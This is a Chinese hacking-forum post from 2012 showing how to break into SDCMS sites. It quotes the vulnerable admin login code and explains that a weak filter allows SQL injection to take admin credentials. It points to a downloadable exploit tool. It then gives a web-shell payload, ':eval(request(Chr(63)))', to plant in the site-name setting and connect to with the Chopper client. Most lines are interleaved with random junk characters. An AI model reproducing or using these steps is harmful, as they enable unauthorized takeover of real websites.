作者:T00LS 鬼哥
5 u2 k) c: B4 `+ i漏洞文件:后台目录/index.asp
/ N+ n2 @ z4 t$ F: ]) {( U7 k- M- q
$ }) b; G# M7 G( m4 g# d( M3 x8 ~ GSub Check
* a. {; ^1 N4 j4 W8 I' }+ g! E2 g Dim username,password,code,getcode,Rs. Z; T4 [3 ^4 `) j8 b7 ?# ]
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub- U! J4 |. e' W; u* I
username=FilterText(Trim(Request.Form("username")),1)
" j4 Z1 Y+ s7 _8 O password=FilterText(Trim(Request.Form("password")),1)
/ N' z3 v' r6 l, }* R. W8 o* M code=Trim(Request.Form("yzm"))
+ G% b5 }- V% J2 i2 {; ^ getcode=Session("SDCMSCode")% J& [0 W. o$ O& b7 n8 P$ n. g) G7 o
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
' y7 d/ O" r$ v; Q. Q/ e) Q6 m, Q IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied Q b8 H% y" Y% G6 H3 j
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied% e0 r% P3 b U- t. ~2 E
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
+ t! O# V& C' c: l. ?% |8 s IF username="" or password="" Then
( m- k. b) T0 o4 z; B# k+ N; d Echo "用户名或密码不能为空"ied
+ |! Z2 `8 Q0 K6 L0 @' v Else! d u/ }. t& i5 U& x
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")2 p6 i1 ^/ V+ r/ L# |
IF Rs.Eof Then, g( Y( ?- K8 G1 M
AddLog username,GetIp,"登录失败",1
5 k8 m1 G3 G. g! Q4 a Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"* _* S/ H5 u$ p# X
Else: r: y: i) t l8 u& o1 y; D$ U
Add_Cookies "sdcms_id",Rs(0), S f2 C8 i! R
Add_Cookies "sdcms_name",username; p) g7 `. M, P1 G# r- y! G; ?
Add_Cookies "sdcms_pwd",Rs(2)
8 I5 T7 T$ [' X Add_Cookies "sdcms_admin",Rs(3)9 {) a! n/ a- c, B9 W
Add_Cookies "sdcms_alllever",Rs(4)
- N- M. |- W: `# n4 O Add_Cookies "sdcms_infolever",Rs(5)$ o2 B2 E& n2 [$ R8 B$ J
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
# t% o. w; U0 ]& e4 z. \7 o0 M AddLog username,GetIp,"登录成功",1; i% ? i4 q2 |% R) \9 J
'自动删除30天前的Log记录
) Q: R2 y6 U3 D" i IF Sdcms_DataType Then
, I) ]4 `; ]! {6 x Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")" ]/ B0 n3 N& x7 [$ s
Else
( M0 ~+ Z( d" _* t8 J- ^ Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")/ ]6 D4 \. D+ c
End IF- `0 r4 J( a& f
Go("sdcms_index.asp"); \/ t6 M7 f3 I' U
End IF
5 v. J% x/ Z7 s8 e2 W5 a Rs.Close
$ W4 u9 E( W' g, a Set Rs=Nothing, D0 f% Q: V7 \ l2 B( f6 R- A
End IF7 I8 s+ ^* s$ r& c# {9 L+ _3 |
End Sub
9 o9 v0 z2 R+ O, b0 Z! S# M5 V* G, n- m$ J7 [
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
$ i' k; ]2 \( W z5 Y
' ?% m& H- F1 W# z8 p; X9 @+ q; rFunction FilterText(ByVal t0,ByVal t1)3 }+ |/ i+ W7 K. |4 R6 j4 m/ c
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function: d5 r( p- a w! o* P8 y% T( i
t0=Trim(t0)
# ]: Z; \0 U6 M& q) C1 ? Select Case t1
. u) P' N6 G8 `" P Case "1"
2 Q1 V9 r- T0 n l8 ` t0=Replace(t0,Chr(32),"")# o! j: m+ d9 J7 f" e' {9 S
t0=Replace(t0,Chr(13),"")$ g( b+ m. |: `9 v
t0=Replace(t0,Chr(10)&Chr(10),"")$ B$ X# C" V0 p4 k# Y
t0=Replace(t0,Chr(10),"")1 c" f3 V/ S# D4 L
Case "2"
* [ |( X) k- K t0=Replace(t0,Chr(8),"")'回格$ N+ Q$ k0 X$ i4 o. K
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
, D* U5 I1 o) J& u* M5 w t0=Replace(t0,Chr(10),"")'换行
5 ^+ {0 M' a1 V* f S t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
+ d* A! l/ a, F4 T) H, z t0=Replace(t0,Chr(12),"")'换页
) f& {0 q" {$ d& y- { t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
# w3 v, z0 u! F% L2 N V- P t0=Replace(t0,Chr(22),"")
5 q8 B- ]: B6 V/ B2 A: U t0=Replace(t0,Chr(32),"")'空格 SPACE
5 k0 w8 R& V. P# g, m t0=Replace(t0,Chr(33),"")'!
. y, g$ Y6 P2 F2 _8 P% D" s t0=Replace(t0,Chr(34),"")'"7 p: P' ` R: s& P. s; I% R
t0=Replace(t0,Chr(35),"")'#
- ]0 o- q- u5 P8 ]5 S+ `0 [/ C t0=Replace(t0,Chr(36),"")'$
. G6 N# x! U% K/ i0 e! @1 c t0=Replace(t0,Chr(37),"")'%
: {2 Y, R& p& H) B* x9 z" s t0=Replace(t0,Chr(38),"")'&4 D' C* @) E6 [1 Y2 u0 {& T
t0=Replace(t0,Chr(39),"")''
* `' }6 p3 n4 z" C9 a" U8 H7 c t0=Replace(t0,Chr(40),"")'(
4 ^0 S: D+ }+ i! H( v1 `6 Q t0=Replace(t0,Chr(41),"")')$ T- `3 W; y6 m7 h" Q4 v. L
t0=Replace(t0,Chr(42),"")'*
; Y% j$ P; o- `. T- S t0=Replace(t0,Chr(43),"")'+
% I& h, ]' L: C' `. c: g7 g& a" ] t0=Replace(t0,Chr(44),"")',, M2 q+ x- f8 a
t0=Replace(t0,Chr(45),"")'-
9 P. }& a3 y2 f7 Q3 v/ M' ^ t0=Replace(t0,Chr(46),"")'.6 l. o9 D2 r T) J% Q
t0=Replace(t0,Chr(47),"")'/; i7 _. M: t, z2 t/ i- K8 F. T
t0=Replace(t0,Chr(58),"")':
# v, b3 V( l% z4 ~3 } t0=Replace(t0,Chr(59),"")';( G8 G+ r+ W" R; e; Q
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>) R+ M% ~4 z- Z+ j
t0=Replace(t0,Chr(63),"")'?7 `) ]& ~- J$ x2 n3 a8 o7 U
t0=Replace(t0,Chr(64),"")'@. X5 E/ U: w6 `4 i& g2 i
t0=Replace(t0,Chr(91),"")'\
+ u5 ~# u% E3 g8 p5 b4 F t0=Replace(t0,Chr(92),"")'\
: ? @* ]$ U) X7 Z. [0 f t0=Replace(t0,Chr(93),"")']
2 H2 Z8 Z" l. r6 T t0=Replace(t0,Chr(94),"")'^9 d8 z3 o/ i# l
t0=Replace(t0,Chr(95),"")'_
! e5 S' e* F! H: @ t0=Replace(t0,Chr(96),"")'`/ l6 t1 D" j2 P$ C: V# e& B
t0=Replace(t0,Chr(123),"")'{% O5 J6 t" |6 W% Y+ v* e! p5 h
t0=Replace(t0,Chr(124),"")'|( ^9 H& D) n7 M# |( ~3 _+ [: |+ S
t0=Replace(t0,Chr(125),"")'}
8 Z. ]9 G3 ^- X/ [9 e0 |2 Q t0=Replace(t0,Chr(126),"")'~
5 A8 I% T* V% l' x) q! ]; M* { Case Else/ V4 ^' e! f0 h4 C3 t
t0=Replace(t0, "&", "&")
, N, r0 @- p! Y }1 x5 q0 f. x3 \/ D* I t0=Replace(t0, "'", "'")
9 W& Y2 c. B% Q5 E5 C t0=Replace(t0, """", """)- H, o" U8 l; W+ A5 o
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
: P2 D- y% r7 L4 l% t& p$ v End Select2 z U" H2 |2 Z" O
IF Instr(Lcase(t0),"expression")>0 Then. y( L( e- L9 } F
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)0 T; j2 e1 n1 L( r+ R: R
End If8 [5 s. N9 P2 @- K( ?
FilterText=t0' N. e- b6 L% p3 |! q
End Function* d8 z( b. \4 ?5 {0 N
3 p8 V I. i( _, v: \看到没。直接参数是1 只过滤/ w& [; E$ `( O0 s4 R& Z- p" @9 R9 z
t0=Replace(t0,Chr(32)," ")
- a7 V* f7 z9 U5 |, {+ k3 f t0=Replace(t0,Chr(13),"")9 [8 p" U- w' }$ Y: Z% a
t0=Replace(t0,Chr(10)&Chr(10),"+ V9 R: b' P) N$ J$ J
")
7 {: {. z8 J" g t0=Replace(t0,Chr(10),"5 L1 W+ D" H* _8 r9 `
")
" K$ u3 V( A7 I漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
+ B3 O3 E3 C4 `. i; d* q# O7 KEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
. x4 X& L2 [6 A8 n' N
8 F3 Q$ K; A4 l% d: l测试:
# h9 O% @& a- R
- N' V6 T9 [) [6 f- N! P5 ?( [9 g" l, I( [# I; G8 h
现在输入工具上验证码,然后点OK( F9 j3 u/ V0 \" \6 M0 q
+ Y/ V+ x0 B( y; X" L
( d$ [; t3 h, x' D看到我们直接进入后台管理界面了,呵呵!
9 q V- Y$ U. k; f/ D4 V5 w& z6 a/ b2 c+ S( }
' B% A* B) C1 J6 a8 F7 P1 M1 f6 k& N3 @* p
这样直接进入后台了。。。。* s# A9 c# |: d7 v) n; {2 a
3 a' o# p. ~7 }2 `, j& i" p
( @# n ^7 l4 y3 J
+ T' r: n' U$ J0 n; ]SDCMS提权:2 b1 A+ {9 q. Y# g! r1 X
. }/ r& b- ^$ B1 {
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?1 d% _, E3 t3 h/ F2 b
+ U) _. Y( I- h" q) J% O. Z/ I( K4 e* Q# `. M
8 l; Z' ?+ g: z7 hOK,现在用菜刀连接下!, s) ^3 H# g) l- V. u9 M! i
( K \9 E$ n. k% r& C5 m6 J
, |& Y* a* b5 ?+ ^, }
4 V- p- y$ V$ F
: R& J. k/ a! ~2 b# }9 `
) \- l" {0 L& u/ Y) H: j6 H |
发表于 2012-11-9 20:57:02
收藏
支持
反对